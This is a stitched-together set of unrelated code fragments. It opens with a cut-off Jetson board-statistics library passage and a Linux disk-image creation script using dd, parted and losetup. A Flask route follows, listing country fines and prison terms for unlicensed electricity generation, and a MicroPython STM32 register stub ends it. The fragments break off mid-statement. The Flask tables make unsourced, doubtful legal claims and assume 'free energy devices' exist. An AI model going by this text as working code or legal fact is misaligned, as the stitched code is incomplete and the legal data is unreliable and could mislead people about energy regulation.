stats['GPU'] = self.gpu['val'] # -- MTS -- if self.mts: stats['MTS FG'] = self.mts['fg'] stats['MTS BG'] = self.mts['bg'] # -- RAM -- stats['RAM'] = self.ram['use'] # -- EMC -- if self.emc: stats['EMC'] = self.ram['use'] # -- IRAM -- if self.iram: stats['IRAM'] = self.ram['use'] # -- SWAP -- if 'use' in self.swap: stats['SWAP'] = self.swap['use'] # -- Engines -- stats['APE'] = self.engine.ape['val'] stats['NVENC'] = self.engine.nvenc['val'] if self.engine.nvenc else 'OFF' stats['NVDEC'] = self.engine.nvdec['val'] if self.engine.nvdec else 'OFF' stats['NVJPG'] = self.engine.nvjpg['rate'] if self.engine.nvjpg else 'OFF' if self.engine.msenc: stats['MSENC'] = self.engine.msenc # -- FAN -- if self.fan: stats['fan'] = self.fan.measure # -- Temperature -- for temp in sorted(self.temperature): stats["Temp {name}".format(name=temp)] = self.temperature[temp] # -- Power -- total, _ = self.power stats['power cur'] = total['cur'] stats['power avg'] = total['avg'] return stats @property def swap(self): """ SWAP manager and reader If you want read the status of your board will return a dictionary with * **use** - Amount of SWAP in use * **tot** - Total amount of SWAP available for applications * **unit** - Unit SWAP, usually in MB * **cached** * **size** - Cache size * **unit** - Unit cache size This property has other extra methods show below * If you want know how many swap are active you can run this extra method .. code-block:: python all_swap = jetson.swap.all The output will be a dictionary, where for each swap: * **used** - Used Swap in kB * **size** - Size in kB * **type** - Type * **prio** - Priority * The method inside this property enable a new swap in your board. To work need to write a *size* in GB and if you want this swap enable in boot you can set *on_boot* on True (default False). This method will create a new swap located usually in **"/"** and called **"swfile"** .. 
code-block:: python jetson.swap.set(size, on_boot=False) * If you want disable the swap created you can run this method .. code-block:: python jetson.swap.deactivate() * This method will show the status of your SWAP created .. code-block:: python status = jetson.swap.is_enable * This method will show the current swap size created .. code-block:: python size = jetson.swap.size() * If you need to clear the cache in your NVIDIA Jetson you can run this extra call .. code-block:: python jetson.swap.clear_cache() :return: swap status :rtype: dict """ return self._swap @property def emc(self): """ EMC is the external memory controller, through which all sysmem/carve-out/GART memory accesses go. If your board have the EMC, the fields are: * **min_freq** - Minimum frequency in kHz * **max_freq** - Maximum frequency in kHz * **frq** - Running frequency in kHz * **val** - Status EMC, value between [0, 100] * **FreqOverride** - Status override :return: emc status :rtype: dict """ # Extract EMC return self._stats.get('emc', {}) @property def iram(self): """ IRAM is memory local to the video hardware engine. If your board have the IRAM, the fields are: * **use** - status iram used * **tot** - Total size IRAM * **unit** - Unit size IRAM, usually in kB * **lfb** - Largest Free Block (lfb) is a statistic about the memory allocator * **size** - Size of
"""
Disk Image Creator

:author: <NAME>
:license: MIT
:version: 2019-07-28
"""

DESCRIPTION = """
Disk Image Creator (.img) - Partitions and copies files to img file

Source code: https://github.com/Ciantic/diskimgcreator

## Defining partitions

Define partitions as directories, .tar or .tar.gz files. Then run this command
with disk image file you want to create.

You can define partitions in *short format* or *long format*.

### Short format

`partitionNN[_msdos]_ENDPOS_TYPE[ .tar | .tar.gz ]`

e.g.:

* `partition01_8MiB_fat32`
* `partition02_16GiB_ext4`

Would define partition table as gpt (the default), create a 16GiB sized image
file, where first partition ending at 8MiB and second partition ending at
16GiB.

Beware with the permissions, especially if you use plain directory.

In short format the first partition always is bootable and starts at 1MiB for
optimal alignment of smaller images.

*Notice*: Underscores in short format are optional, you may also use spaces.

### Long format

You can also define partitions in *long format*, if you want to partition like
it's 1947:

`partitionNN [-- dd FULLSIZE] -- parted PARTEDCMD[ .tar | .tar.gz ]`

e.g.:

* `partition01 -- dd 256MiB -- parted mklabel msdos mkpart primary fat32 1 8MiB`
* `partition02 -- parted mkpart primary ext4 8MiB 100%`

Would create 256MiB sized image, with 7MiB fat32 partition and 248MiB ext4
partition. Consult parted manual for the scripting syntax.

Full size used in initial dd is parsed only from the first partition.
"""

import uuid
from typing import List, Optional
import argparse
import glob
import sys
import os
import re
import io
import datetime
import textwrap
import subprocess
import logging

# Module-wide verbosity flag, toggled via `_set_verbose()` (CLI `-v`).
VERBOSE = False


def _set_verbose(val: bool):
    """Set the module-wide verbosity flag."""
    global VERBOSE
    VERBOSE = val


def _is_verbose():
    """Return the current verbosity flag."""
    return VERBOSE


def print_error(err: str):
    """Print *err* in red to stderr (always, regardless of verbosity)."""
    CRED = "\033[91m"
    CEND = "\033[0m"
    print(CRED + "Error: " + err + CEND, file=sys.stderr)


def print_ok(ok: str):
    """Print *ok* in green to stdout, only when verbose."""
    CGREEN = "\33[32m"
    CEND = "\033[0m"
    if VERBOSE:
        print(CGREEN + ok + CEND)


def print_notice(notice: str):
    """Print *notice* in blue to stdout, only when verbose."""
    CBLUE2 = "\33[94m"
    CEND = "\033[0m"
    if VERBOSE:
        print(CBLUE2 + notice + CEND)


class UnknownFilesystemException(Exception):
    """Raised when a partition declares a filesystem type we cannot mkfs."""

    def __init__(self, fstype: str):
        self.fstype = fstype


class ImageFileExistsException(Exception):
    """Raised when the target image file already exists (and no --force)."""

    def __init__(self, imagefile: str):
        self.imagefile = imagefile


class PartitionSizeParseException(Exception):
    """Raised when a partition/disk size string cannot be parsed."""

    def __init__(self, size: Optional[str] = None):
        self.size = size


class PartitionsNotFoundException(Exception):
    """Raised when the partitions directory contains no partition entries."""

    pass


class PartitionParseException(Exception):
    """Raised when a partition file name matches neither short nor long format."""

    def __init__(self, filename: str):
        self.filename = filename


class PartfsMountInUseException(Exception):
    """Raised when the partfs mount directory is not empty."""

    def __init__(self, mountdir: str):
        self.mountdir = mountdir


class Partfs:
    """
    Mounts diskimage partitions as FUSE mounts.

    Context manager: ``__enter__`` mounts the image via ``partfs`` and returns
    the sorted list of per-partition paths (``<mountdir>/pN``); ``__exit__``
    unmounts and removes the mount directory.
    """

    def __init__(self, diskimage: str, mountdir: str):
        self.diskimage = diskimage
        self.mountdir = mountdir
        # Ensure the mount directory exists and refuse to reuse a non-empty
        # one -- a leftover mount would silently shadow our partitions.
        if not os.path.exists(mountdir):
            os.mkdir(mountdir)
        if os.listdir(mountdir):
            raise PartfsMountInUseException(mountdir)

    def __enter__(self):
        if not os.path.isdir(self.mountdir):
            os.mkdir(self.mountdir)
        try:
            subprocess.run(
                ["partfs", "-o", f"dev={self.diskimage}", self.mountdir], check=True
            )
        except subprocess.CalledProcessError as err:
            print_error("Partfs failed.")
            raise err
        print_ok(f"Partfs {self.mountdir} mounted.")
        # Partition entries appear inside the mount dir as p1, p2, ...
        return sorted(glob.glob(os.path.join(self.mountdir, r"p[0-9]*")))

    def __exit__(self, type, value, traceback):
        try:
            subprocess.run(["fusermount", "-u", self.mountdir], check=True)
        except subprocess.CalledProcessError as err:
            print_error("Unmount failed.")
            raise err
        os.rmdir(self.mountdir)
        print_ok(f"Partfs {self.mountdir} unmounted.")


class Losetup:
    """
    Mounts diskimage partitions as loop devices.

    This requires permissions to create or loop devices. This tries to use a
    free loop device if available. If not then it tries to create one with
    mknod. On exit it will free the losetup but does not try to delete the
    created mknod.
    """

    def __init__(self, diskimage: str):
        self.diskimage = diskimage

    def __enter__(self):
        self.device = None

        # Get or create losetup device
        losetup_f = subprocess.run(["losetup", "-f"], text=True, capture_output=True)
        if losetup_f.returncode == 0:
            self.device = losetup_f.stdout.strip()
        elif losetup_f.stderr.startswith(
            "losetup: cannot find an unused loop device: No such device"
        ):
            # No loop devices at all (e.g. minimal container): create loop0.
            subprocess.run(["mknod", "/dev/loop0", "b", "7", "0"], check=True)
            self.device = "/dev/loop0"
        else:
            losetup_f.check_returncode()

        try:
            # -P asks the kernel to scan the partition table and expose
            # per-partition devices.
            subprocess.run(["losetup", "-P", self.device, self.diskimage], check=True)
        except subprocess.CalledProcessError as err:
            print_error(f"Losetup {self.device} failed.")
            raise err
        print_ok(f"Losetup {self.device} created.")
        # FIX: loop partitions are sibling device nodes named
        # /dev/loopNp1, /dev/loopNp2, ... -- the previous
        # os.path.join(self.device, "p[0-9]*") built '/dev/loopN/p*', a
        # pattern that can never match a block device. Sorted for a
        # deterministic order (consistent with Partfs).
        return sorted(glob.glob(self.device + "p[0-9]*"))

    def __exit__(self, type, value, traceback):
        if self.device:
            try:
                subprocess.run(["losetup", "-d", self.device], check=True)
            except subprocess.CalledProcessError as err:
                print_error(f"Losetup failed to free device: {self.device}")
                raise err
            print_ok(f"Losetup {self.device} freed.")


class Mount:
    """Normal Linux mount operation (context manager)."""

    def __init__(self, source: str, target: str):
        self.source = source
        self.target = target

    def __enter__(self):
        if not os.path.isdir(self.target):
            os.mkdir(self.target)
        try:
            subprocess.run(["mount", self.source, self.target], check=True)
        except subprocess.CalledProcessError as err:
            print_error("Mount failed.")
            raise err
        print_ok(f"Mount {self.target} created.")
        return self.target

    def __exit__(self, type, value, traceback):
        try:
            subprocess.run(["umount", self.target], check=True)
        except subprocess.CalledProcessError as err:
            print_error(f"Unmount failed to free target: {self.target}")
            raise err
        os.rmdir(self.target)
        print_ok(f"Mount {self.target} freed.")


class Partition:
    """
    One partition definition: source file/directory, its parted command and
    filesystem type.
    """

    def __init__(self, filename: str, parted: str, fstype: str = ""):
        self.filename = filename
        self.parted = parted
        self.fstype = fstype

    def is_mountable(self):
        """Return True when the partition carries a mountable filesystem."""
        # Swap partitions have no filesystem to copy files onto.
        if self.fstype == "linux-swap":
            return False
        return True

    def _untar(self, to_dir: str, tar_flags: str, notice: str):
        """Extract ``self.filename`` into *to_dir* with the given tar flags."""
        print_notice(notice)
        try:
            subprocess.run(
                ["tar", "--same-owner", tar_flags, self.filename, "-C", to_dir],
                check=True,
            )
        except subprocess.CalledProcessError as err:
            print_error("Untar failed.")
            raise err
        print_ok(f"Untar from '{self.filename}' succeeded.")

    def try_copy_to(self, to_dir: str):
        """Copy/extract this partition's source into the mounted dir *to_dir*."""
        if os.path.isdir(self.filename):
            # Directory
            # NOTE(review): `cp -rp SRC DEST` copies the directory *itself*
            # into DEST (producing DEST/SRC), not its contents -- confirm
            # this is the intended layout.
            print_notice(f"Copy -rp files from '{self.filename}' to '{to_dir}'...")
            try:
                subprocess.run(["cp", "-rp", self.filename, to_dir], check=True)
            except subprocess.CalledProcessError as err:
                print_error("Copying files failed.")
                raise err
            print_ok(f"Copying from '{self.filename}' succeeded.")
        elif self.filename.endswith(".tar"):
            # .tar files
            self._untar(
                to_dir,
                "-xf",
                f"Untar files from '{self.filename}' to '{to_dir}'...",
            )
        elif self.filename.endswith(".tar.gz"):
            # .tar.gz files
            self._untar(
                to_dir,
                "-xzf",
                f"Untar gzip files from '{self.filename}' to '{to_dir}'...",
            )


class PartitionCollection:
    """Ordered collection of `Partition` objects parsed from a directory."""

    def __init__(self, partitions: List[Partition]):
        self._partitions = partitions

    def get_total_size(self):
        """
        Tries to get the total size of the image.

        In long format it's defined in first file, for example: `-- dd 1GiB`.
        In short format it's defined in the last file.
        """
        long_format = re.compile(r".* -- dd (?P<size_all>[^ $]+)")
        short_format = re.compile(r".*partition(\d\d?)[_ ](?P<partition_end>[^_ ]+)")

        # In long format the size is on first file
        m = long_format.match(self._partitions[0].filename)
        if m:
            return _parse_size(m.group("size_all"))

        # In short format the size is the last partition end
        m = short_format.match(self._partitions[-1].filename)
        if m:
            return _parse_size(m.group("partition_end"))

        raise PartitionSizeParseException()

    def get_parted(self):
        """Return the parted command of every partition, in order."""
        return list(map(lambda k: k.parted, self._partitions))

    def get_fstypes(self):
        """Return the filesystem type of every partition, in order."""
        return list(map(lambda k: k.fstype, self._partitions))

    def __iter__(self):
        return iter(self._partitions)

    @classmethod
    def from_directory(cls, from_dir: str):
        """Parse ``partitionNN*`` entries of *from_dir* into a collection."""
        partition_filenames = sorted(
            glob.glob(os.path.join(from_dir, "partition[0-9][0-9]?*"))
        )
        # Long format takes precedence; fall back to short format.
        partitions = _try_get_partitions_long_format(
            partition_filenames
        ) or _try_get_partitions_short_format(partition_filenames)
        if len(partitions) == 0:
            raise PartitionsNotFoundException()
        return PartitionCollection(partitions)


class Imagefile:
    """The target .img file: creation, partitioning and mounting."""

    def __init__(self, filename: str):
        self.filename = filename

    def make_empty(self, total_size: int, overwrite: bool = False):
        """Create an empty image of *total_size* bytes (dd)."""
        _try_dd(self.filename, total_size, overwrite)

    def partition(self, partitions: PartitionCollection):
        """Write the partition table with parted."""
        _try_parted(self.filename, partitions.get_parted())

    def mount(
        self,
        partitions: PartitionCollection,
        use_partfs=False,
        partfs_mount_dir="/mnt/_temp_partfs",
    ):
        """Return a context manager exposing (partition, device/path) pairs."""
        return ImagefileMounted(
            self, partitions, use_partfs=use_partfs, partfs_mount_dir=partfs_mount_dir
        )


class ImagefileMounted:
    """
    Context manager pairing each `Partition` with its mounted device/path,
    using either FUSE partfs or losetup.
    """

    def __init__(
        self,
        imagefile: Imagefile,
        partitions: PartitionCollection,
        use_partfs=False,
        partfs_mount_dir="/mnt/_temp_partfs",
    ):
        self.imagefile = imagefile
        self.use_partfs = use_partfs
        self.partitions = partitions
        self.partfs_mount_dir = partfs_mount_dir

    def __enter__(self):
        if self.use_partfs:
            self._mount = Partfs(self.imagefile.filename, self.partfs_mount_dir)
        else:
            self._mount = Losetup(self.imagefile.filename)
        self._partition_dirs = self._mount.__enter__()
        return zip(self.partitions, self._partition_dirs)

    def __exit__(self, type, value, traceback):
        self._mount.__exit__(type, value, traceback)


def try_create_image(
    rootdir: str,
    imagefilename: str,
    overwrite: bool = False,
    use_partfs=False,
    partfs_mount_dir="/mnt/_temp_partfs",
    mount_root_dir="/mnt/_temp_fs",
):
    """
    Create *imagefilename* from the partition definitions found in *rootdir*:
    allocate the empty image, write the partition table, mkfs each partition
    and copy/extract its source files.
    """
    print(f"Partitions directory: {rootdir}")
    print(f"Image file to create: {imagefilename}")
    partitions = PartitionCollection.from_directory(rootdir)
    total_size = partitions.get_total_size()
    imagefile = Imagefile(imagefilename)
    imagefile.make_empty(total_size, overwrite)
    imagefile.partition(partitions)
    with imagefile.mount(
        partitions, use_partfs=use_partfs, partfs_mount_dir=partfs_mount_dir
    ) as partition_dirs:
        for partition, partition_dir in partition_dirs:
            _try_mkfs(partition_dir, partition.fstype)
            # Swap partitions are formatted but never mounted/populated.
            if partition.is_mountable():
                with Mount(partition_dir, mount_root_dir) as mntdir:
                    partition.try_copy_to(mntdir)


def parse_cli_arguments():
    """Build the argument parser and parse ``sys.argv``."""
    # https://docs.python.org/3/library/argparse.html
    # https://docs.python.org/3/howto/argparse.html
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter, description=DESCRIPTION
    )
    parser.add_argument("imagefile", action="store")
    parser.add_argument(
        "-d",
        "--partitions-dir",
        help="Directory of the partitions, defaults to current directory",
        action="store",
        default=".",
    )
    parser.add_argument(
        "-f", "--force", help="Overwrites any existing image file", action="store_true"
    )
    # NOTE(review): the help text promises a docker-environment default, but
    # no such detection is implemented here -- confirm.
    parser.add_argument(
        "--use-partfs",
        help="Uses FUSE based partfs instead of losetup for mounting partitions, defaults to true in docker environment",
        action="store_true",
    )
    parser.add_argument("-v", "--verbose", action="store_true")
    return (parser, parser.parse_args())


def main():
    global VERBOSE
    _, args = parse_cli_arguments()
    _set_verbose(args.verbose)

    # TODO: Something fun?
# if sys.stdout.isatty(): # print_notice("You are running interactively") # Fail if partitions directory does not exist if not os.path.isdir(args.partitions_dir): print_error(f"Directory '{args.partitions_dir}' does not exist") exit(1) # Call the main creator try: try_create_image( args.partitions_dir, args.imagefile, overwrite=args.force, use_partfs=args.use_partfs, partfs_mount_dir="/mnt/_tmp_partfs{}".format(uuid.uuid4().hex), ) except ImageFileExistsException as err: print_error( f"Image file '{err.imagefile}' already exists, use `-f` to overwrite" ) except PartitionsNotFoundException: print_error(f"Directory '{args.partitions_dir}' does not contain partitions.") exit(1) except PartitionSizeParseException as err: print_error(f"Unable to parse disk size {err.size}") exit(1) except PartitionParseException as err: print_error(f"Unable to parse partition file name: {err.filename}") exit(1) except subprocess.CalledProcessError as err: print_error( f"Return code: {err.returncode}, Command: {subprocess.list2cmdline(err.cmd)}" ) exit(1) def _parse_size(size: str): """ Parse size for parted Note: This is not accurate reproduction of parted function `ped_unit_parse_custom` """ units = { "": 1000 ** 2, # Parted assumes MB if no unit is given "s": 512, # Can this vary? "b": 1, "kb": 1000, "mb": 1000 ** 2, "gb": 1000 ** 3, "tb": 1000 ** 4, "kib": 1024, "mib": 1024 ** 2, "gib": 1024 ** 3, "tib": 1024 ** 4, } m = re.match(r"^([\d\.]+)(.*)$",
to unlimited power / Any devices', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'China', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'North Korea', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'South Korea', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'United Arab Emirates', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Georgia', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'India', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Indonesia', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Iraq', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Iran', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Israel', 'k2': '?', 'k3': '3', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Japan', 'k2': '1 million yen', 'k3': '5', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Jordan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Kazakhstan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Kyrgyzstan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 1 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Kuwait', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Laos', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Lebanon', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Malaysia', 'k2': '100 thousand ringgit', 'k3': '5', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'The Maldives', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': 
'?', 'k6': 'No'}, {'k1': 'Mongolia', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 1,5 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Nepal', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 1 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Oman', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 25 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Uzbekistan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Pakistan', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Palestine', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Philippines', 'k2': 'Fifty million pesos ', 'k3': '2', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Qatar', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Singapore', 'k2': '$500,000', 'k3': '0', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Sri Lanka', 'k2': 'A fine not less than one hundred thousand rupees and not exceeding ten million rupees', 'k3': '0', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Syria', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Tajikistan', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Thailand', 'k2': '0,00 €', 'k3': '2', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Timor Leste', 'k2': 'a fine of US$ 500 to US$ 5,000 or of US$ 5,000 to US$ 50,000,', 'k3': '0', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Turkmenistan', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Vietnam', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Yemen', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Kurdistan', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Tibet', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Ryūkyū', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Christmas island', 'k2': '?', 
'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Cocos island', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Hong Kong', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Macao', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Abkhazie', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Haut-Karabagh', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'South Ossetia', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Taiwan', 'k2': 'NT$200,000 to NT$2,000,000', 'k3': '0', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'} ] return jsonify(data) # Get information about electricity generation without license in Africa # k1 = country # k2 = Amount of the fine for electricity generation without license and not connected to the national grid for # internal needs ? # k3 = Number of years of imprisonment for electricity generation without license and not linked to any grid or # network for internal needs ? # k4 = Possible use of free energy devices for internal needs without licence ? # k5 = Possible control of the power plant by any jurisdictions without that the producer holds a license ? # k6 = Flixbus in the capital ? 
@app.route("/international_electricity_generation_without_license_in_africa") def international_electricity_generation_without_license_in_africa(): data = [ {'k1': 'South Africa', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Algeria', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 25 MW with declaration / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Angola', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Benin', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Botswana', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 25 kW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Burkina Faso', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Burundi', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Cameroon', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 100 kW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Cape Verde', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Central African Republic', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Comoros', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Republic of Congo', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Democratic Republic Of The Congo', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Ivory coast', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Djibouti', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Egypt', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Eritrea', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Ethiopia', 'k2': '?', 'k3': '?', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Eswatini', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Gabon', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Gambia', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 
unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Ghana', 'k2': '?', 'k3': '?', 'k4': 'No', 'k5': 'Yes', 'k6': 'No'}, {'k1': 'Guinea', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Guinea Bissau', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Equatorial Guinea', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'}, {'k1': 'Kenya', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to 1 MW / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Lesotho', 'k2': '0,00 €', 'k3': '0', 'k4': 'Yes up to unlimited power / Any devices', 'k5': 'No', 'k6': 'No'}, {'k1': 'Liberia', 'k2': '?', 'k3': '?', 'k4': '?', 'k5': '?', 'k6': 'No'},
# Source: stubs/micropython-v1_12-pyboard/stm.py  (extraction marker <gh_stars>0
# converted to a comment: the raw marker was not valid Python syntax)
"""
Module: 'stm' on micropython-v1.12-pyboard

Peripheral base addresses and register offsets for the STM32F405RG as exposed
by MicroPython's `stm` module.  Names without an underscore-suffixed register
part (e.g. GPIOA, TIM2) are absolute peripheral base addresses; names of the
form PERIPH_REG (e.g. GPIO_ODR, TIM_CNT) are byte offsets to be added to a
peripheral base when poking registers via stm.mem32 / mem16 / mem8.
"""
# MCU: {'ver': 'v1.12', 'port': 'pyboard', 'arch': 'armv7emsp', 'sysname': 'pyboard', 'release': '1.12.0', 'name': 'micropython', 'mpy': 7685, 'version': '1.12.0', 'machine': 'PYBv1.1 with STM32F405RG', 'build': '', 'nodename': 'pyboard', 'platform': 'pyboard', 'family': 'micropython'}
# Stubber: 1.5.4
from typing import Any

# NOTE(review): the original paste had all of these collapsed onto a few
# physical lines, which left every assignment after the first '#' on each
# line inside a comment (i.e. dead).  Restored to one statement per line.

# --- ADC (analog-to-digital converters) ---
ADC1 = 1073815552  # type: int
ADC123_COMMON = 1073816320  # type: int
ADC2 = 1073815808  # type: int
ADC3 = 1073816064  # type: int
ADC_CR1 = 4  # type: int
ADC_CR2 = 8  # type: int
ADC_DR = 76  # type: int
ADC_HTR = 36  # type: int
ADC_JDR1 = 60  # type: int
ADC_JDR2 = 64  # type: int
ADC_JDR3 = 68  # type: int
ADC_JDR4 = 72  # type: int
ADC_JOFR1 = 20  # type: int
ADC_JOFR2 = 24  # type: int
ADC_JOFR3 = 28  # type: int
ADC_JOFR4 = 32  # type: int
ADC_JSQR = 56  # type: int
ADC_LTR = 40  # type: int
ADC_SMPR1 = 12  # type: int
ADC_SMPR2 = 16  # type: int
ADC_SQR1 = 44  # type: int
ADC_SQR2 = 48  # type: int
ADC_SQR3 = 52  # type: int
ADC_SR = 0  # type: int

# --- CAN / CRC ---
CAN1 = 1073767424  # type: int
CAN2 = 1073768448  # type: int
CRC = 1073885184  # type: int
CRC_CR = 8  # type: int
CRC_DR = 0  # type: int
CRC_IDR = 4  # type: int

# --- DAC ---
DAC = 1073771520  # type: int
DAC1 = 1073771520  # type: int
DAC_CR = 0  # type: int
DAC_DHR12L1 = 12  # type: int
DAC_DHR12L2 = 24  # type: int
DAC_DHR12LD = 36  # type: int
DAC_DHR12R1 = 8  # type: int
DAC_DHR12R2 = 20  # type: int
DAC_DHR12RD = 32  # type: int
DAC_DHR8R1 = 16  # type: int
DAC_DHR8R2 = 28  # type: int
DAC_DHR8RD = 40  # type: int
DAC_DOR1 = 44  # type: int
DAC_DOR2 = 48  # type: int
DAC_SR = 52  # type: int
DAC_SWTRIGR = 4  # type: int

# --- Debug MCU ---
DBGMCU = 3758366720  # type: int
DBGMCU_APB1FZ = 8  # type: int
DBGMCU_APB2FZ = 12  # type: int
DBGMCU_CR = 4  # type: int
DBGMCU_IDCODE = 0  # type: int

# --- DMA ---
DMA1 = 1073897472  # type: int
DMA2 = 1073898496  # type: int
DMA_HIFCR = 12  # type: int
DMA_HISR = 4  # type: int
DMA_LIFCR = 8  # type: int
DMA_LISR = 0  # type: int

